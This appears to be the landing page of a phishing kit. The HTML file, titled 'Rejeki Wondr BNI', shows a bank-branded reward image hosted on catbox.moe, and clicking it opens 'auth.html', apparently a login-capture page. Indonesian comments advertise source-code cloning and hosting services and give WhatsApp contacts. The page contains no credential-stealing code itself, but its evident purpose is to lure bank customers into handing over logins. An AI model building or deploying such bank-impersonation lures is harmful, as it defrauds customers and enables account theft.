<!--
🔧 OPEN JASA LAYANAN KODE & HOSTING 🔧

✅ Clone Source Code (SC)
✅ Perbaikan / Bengkel SC
✅ Custom & Modifikasi Project
✅ Semua Kebutuhan SC / Hosting TERMURAH!

📞 Hubungi
WA : 62882006448584 (Master Coding – Fullstack Developer)
-->
<!DOCTYPE html>
<html lang="id">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Rejeki Wondr BNI</title>
  <style>
    body {
      margin: 0;
      padding: 0;
      text-align: center;
      background-color: #f9f9f9;
    }

    .redirect-img {
      max-width: 100%;
      height: auto;
      cursor: pointer;
    }
  </style>
</head>
<body>

  <a href="auth.html">
    <img src="https://files.catbox.moe/s3k7o0.jpg" alt="Rejeki Wondr BNI" class="redirect-img">
  </a>

</body>
</html>
<!--
🔧 OPEN JASA LAYANAN KODE & HOSTING 🔧

✅ Clone Source Code (SC)
✅ Perbaikan / Bengkel SC
✅ Custom & Modifikasi Project
✅ Semua Kebutuhan SC / Hosting TERMURAH!

📞 Hubungi
WA : 6287875413098 (Master Coding – Fullstack Developer)
-->
